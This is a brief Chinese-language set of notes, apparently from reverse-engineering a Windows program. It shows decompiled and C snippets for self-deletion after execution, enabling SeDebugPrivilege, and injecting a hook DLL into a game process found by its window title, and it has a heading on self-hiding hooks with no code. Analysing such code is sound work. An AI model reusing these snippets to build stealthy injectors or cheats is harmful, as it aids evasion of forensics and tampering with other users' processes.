1. 运行后删除自身:
BOOL __cdecl sub_403754()
{
CHAR CmdLine; // [sp+4h] [bp-400h]@1
GetModuleFileNameA(0, PathName, 0x104u);
wsprintfA(&CmdLine, "cmd.exe /c del \"%s\" ", PathName);
WinExec(&CmdLine, 0);
return sub_403739();
}
BOOL __cdecl sub_403739()
{
DWORD v0; // eax@1
HANDLE v1; // eax@1
v0 = GetCurrentProcessId();
v1 = OpenProcess(1u, 0, v0);
return TerminateProcess(v1, 0);
}
2. 提权
void AdjustPrivilege()
{
HANDLE hToken;
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
{
TOKEN_PRIVILEGES tp;
tp.PrivilegeCount = 1;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid))
{
AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);
}
CloseHandle(hToken);
}
}
3. XX隐藏自身的几个hook
4. 根据窗口实施钩子注入
v1 = FindWindowA(0, "*****“);
if ( !v1 )
Messagebox("未找到游戏", 0, 0);
v2 = GetWindowThreadProcessId(v1, 0);
v3 = GetModuleHandleA("gamedll.dll");
SetWindowsHookExA(2, fn, v3, v2);